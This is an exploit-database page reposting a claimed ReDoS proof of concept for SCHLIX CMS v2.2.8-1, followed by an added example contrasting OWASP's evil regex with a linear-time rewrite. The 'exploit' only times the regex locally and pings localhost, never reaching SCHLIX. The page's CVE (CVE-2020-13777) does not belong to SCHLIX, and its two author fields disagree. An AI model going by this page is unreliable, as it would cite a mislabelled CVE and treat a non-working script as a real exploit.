SCHLIX v2.2.8-1 Regular Expression Denial of Service

CVE:               CVE-2020-13777
Category:          CWE-400
Price:             Unknown
Severity:          High
Author:            Baptiste Autin
Risk:              High
Exploitation Type: Remote
Date:              2024-02-10
CVSS:              CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020040

Below is a copy:

# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://www.schlix.com
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: v2.2.8-1
# Tested on: Windows 11 + XAMPP


## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service (ReDoS). ReDoS is an algorithmic complexity attack that produces a denial of service by supplying a regular expression and/or an input that takes a very long time to evaluate. The proof of concept below reproduces the effect locally with the `(.*a){x}` for x > 10 pattern (listed as an evil regex by OWASP) and then only checks that the target URL still answers; it does not name the SCHLIX endpoint or parameter through which the attacker-controlled expression or input reaches the regex engine.



## Proof Of Concept ##

import re
import time

import requests


def test_redos(url, payload):
    # OWASP's "evil regex" (.*a){x} for x > 10, with x = 11. The original
    # pattern string '(.*a){x} for x > 10' was not a valid quantifier (the
    # '{x}' is taken literally), so the engine never backtracked. The trailing
    # '$' means the payload's final '!' can never be matched, which forces the
    # engine to try every way of splitting the a's into eleven groups.
    vulnerable_regex = r'(.*a){11}$'

    try:
        start = time.perf_counter()
        match = re.match(vulnerable_regex, payload)
        print(f"Regex evaluation took {time.perf_counter() - start:.2f}s")

        if match:
            print("Vulnerability not triggered.")
        else:
            print("Vulnerability may be present. Simulating 30-second impact...")

            for _ in range(6):
                time.sleep(5)
                print("Simulating impact...")

            print("Simulated impact duration completed.")

    except re.error:
        print("Error in regex pattern.")

    # The regex above is evaluated locally; this request only checks whether
    # the target still answers and does not submit the payload to SCHLIX.
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            print("Service is up.")
        else:
            print("Service may be down or inaccessible.")
    except requests.RequestException as e:
        print(f"HTTP Request Error: {str(e)}")


if __name__ == "__main__":
    target_url = 'http://localhost'

    # A run of a's followed by '!' so that the anchored pattern cannot match.
    payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

    test_redos(target_url, payload)
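The proof of concept above evaluates the `(.*a){x}` for x > 10 pattern locally. What follows is an added example, not code from the original post and not SCHLIX code: it puts that evil regex (x = 11, anchored with `$` so a payload ending in `!` forces exhaustive backtracking) next to a linear-time rewrite that accepts exactly the same strings, checks that the two patterns agree on every short input, and times both. The pattern names, the payload generator and the input sizes are assumptions made for the example.

```python
import itertools
import re
import time

# OWASP's "evil regex" (.*a){x} with x = 11 (constructed for this example).
# Anchored at the end, a payload that ends in a non-'a' character can never
# match, so the engine tries every way of splitting the leading a's into
# eleven groups: the work grows like C(n, 11) in the number n of a's.
EVIL_PATTERN = re.compile(r"(.*a){11}$")

# Hardened rewrite (constructed for this example) that accepts exactly the
# same strings (ends with 'a' and contains at least eleven a's) but runs in
# linear time: '[^a]*' and 'a' can never match the same character, so each
# repetition has exactly one way to consume the input and backtracking never
# branches.
SAFE_PATTERN = re.compile(r"(?:[^a]*a){11,}$")


def redos_payload(n):
    """Constructed input: n repeated a's followed by a character that defeats the match."""
    return "a" * n + "!"


def timed_match(pattern, text):
    """Return (matched, seconds) for pattern.match(text)."""
    start = time.perf_counter()
    matched = pattern.match(text) is not None
    return matched, time.perf_counter() - start


def measure_growth(pattern, sizes):
    """Time pattern.match on redos_payload(n) for each n in sizes.

    Keep sizes small (about 20 or less) for EVIL_PATTERN; above that the
    evaluation takes seconds to minutes, which is the whole point of ReDoS.
    """
    return [(n, timed_match(pattern, redos_payload(n))[1]) for n in sizes]


def same_language(p, q, alphabet="a!", max_len=13):
    """Exhaustively confirm that two start-anchored patterns accept the same
    strings over `alphabet` up to `max_len` characters. This is the regression
    check to run whenever a regex is rewritten for performance: the fix must
    not silently change what is accepted."""
    for length in range(max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            s = "".join(chars)
            if (p.match(s) is None) != (q.match(s) is None):
                return False
    return True


if __name__ == "__main__":
    print("rewrite accepts the same strings:", same_language(EVIL_PATTERN, SAFE_PATTERN))
    for n, secs in measure_growth(EVIL_PATTERN, (12, 14, 16, 18, 20, 22)):
        print(f"evil  n={n:5d}: {secs:8.4f}s")
    _, secs = timed_match(SAFE_PATTERN, redos_payload(20000))
    print(f"safe  n=20000: {secs:8.4f}s")
```

Run as a script, the evil pattern's evaluation time climbs steeply between n = 12 and n = 22 while the rewrite rejects a 20,000-character payload almost instantly. The fix generalises beyond this pattern: whenever adjacent repeated pieces of a regex can match the same characters (nested quantifiers, `.*` next to `.*`, overlapping alternations), rewrite them so they are mutually exclusive, or use the possessive quantifiers and atomic groups Python 3.11 added, and keep an exhaustive equivalence check like `same_language` beside the rewrite.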

Copyright ©2024 Exploitalert.